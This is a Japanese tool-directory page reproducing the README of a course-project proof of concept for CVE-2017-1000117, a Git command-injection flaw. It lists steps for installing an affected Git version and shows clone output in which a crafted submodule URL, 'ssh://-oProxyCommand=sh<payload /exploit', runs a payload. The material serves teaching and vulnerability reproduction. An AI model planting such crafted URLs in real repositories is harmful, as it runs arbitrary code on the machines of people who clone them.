Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-1000117 — CVE-2017-1000117 脆弱性の再現(PoC+Exp) | Kitploit
ツール/GitHubGitHub/anonymking/cve-2017-1000117
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

CVE-2017-1000117 脆弱性の再現(PoC+Exp)

リポジトリを見る
3217年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2017-1000117

プロジェクト概要

  • ネットワークセキュリティコース設計のテーマの一つ
  • CVE-2017-1000117 脆弱性の再現(PoC+Exp)
  • Git + SSH

脆弱性の概要:

  • 脆弱性名称: Gitコマンドインジェクション脆弱性
  • CNNVD番号:CNNVD-201708-670
  • 危険度:中
  • CVE番号:CVE-2017-1000117
  • 脆弱性タイプ:コマンドインジェクション
  • 公開日:2017-08-16
  • 脅威タイプ:リモート
  • 更新日:2017-10-17
  • ベンダー:git-scm
  • 脆弱性発見者:TrevorJay
  • 脆弱性概要:Gitは、アメリカのソフトウェア開発者リーナス・トーバルズ(Linus Torvalds)によって開発された、無料でオープンソースの分散バージョン管理システムです。Git 2.7.5より前のバージョンにはコマンドインジェクションの脆弱性が存在します。リモート攻撃者は特別に細工された'ssh://...' URLを介して、任意のデバイス上で任意のプログラムを実行する可能性があります。

悪用手順

  • 脆弱性の影響を受けるバージョンのGitツールをインストールします([Git for Linux](https://github.com/git/git/releases](https://mirrors.edge.kernel.org/pub/software/scm/git/)、[Git for Windows](https://github.com/git-for-windows/git/releases))
  • ここではgit-2.12.1バージョンを選択しました(LinuxとWindowsの両方で動作確認済み)。LinuxおよびWindows対応の2.12.1バージョンのダウンロードリンクはそれぞれ git-2.12.1.tar.gz 、 です。
Git-2.12.1-64-bit.tar.bz2
  • Gitをインストールしたら、サブモジュールを含めてプロジェクトをクローンします:git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
  • root@kitploit:~
    $ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
    Cloning into 'CVE-2017-1000117'...
    remote: Enumerating objects: 14, done.
    remote: Counting objects: 100% (14/14), done.
    remote: Compressing objects: 100% (13/13), done.
    remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
    Unpacking objects: 100% (14/14), done.
    Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
    Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
    Pseudo-terminal will not be allocated because stdin is not a terminal.
    
    
    *********************************************
                       _ooOoo_
                      o8888888o
                      88" . "88
                      (| -_- |)
                      O\  =  /O
                   ____/`---'\____
                 .'  \\|     |//  `.
                /  \\|||  :  |||//  \
               /  _||||| -:- |||||-  \
               |   | \\\  -  /// |   |
               | \_|  ''\---/''  |   |
               \  .-\__  `-`  ___/-. /
             ___`. .'  /--.--\  `. . __
          ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
         | | :  `- \`.;`\ _ /`;.`/ - ` : | |
         \  \ `-.   \_ __\ /__ _/   .-` /  /
    ======`-.____`-.___\_____/___.-`____.-'======
                       `=---='
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    
    ssh_exchange_identification: Connection closed by remote host
    fatal: Could not read from remote repository.
    
    Please make sure you have the correct access rights
    and the repository exists.
    fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
    Failed to clone 'exploit'. Retry scheduled
    
    • 仏陀が現れたとき、脆弱性が再現され、ペイロード内の悪意のあるコードが正常に実行されたことを示しています。

    2019/06/21 10:30 更新

    • レポートを作成中に、この脆弱性が CVE-2018-17456 と非常によく似ていることに気づきました。言い回しが異なるだけで、根本的には記号「-」を正しく解析できず、パラメータとして誤って解釈することが任意のコード実行につながるという点で同じです。
    • CVE-2018-17456 脆弱性の悪用については、こちらのブログ記事を参照してください:[『Git Submodule 脆弱性(CVE-2018-17456)分析』](https://paper.seebug.org/716/](https://paper.seebug.org/716/)

    2019/06/21 19:39 更新

    • 関連資料を調査している際に、非常によく似た脆弱性 CVE-2018-11235 を発見しました。
    • CVE-2018-11235 脆弱性に関する参考記事をいくつか示します:CVE-2018-11235 git RCE、PoC exploit for CVE-2018-11235、Gitリモートコード実行脆弱性(CVE-2018-11235)の詳細分析
    ツールをダウンロード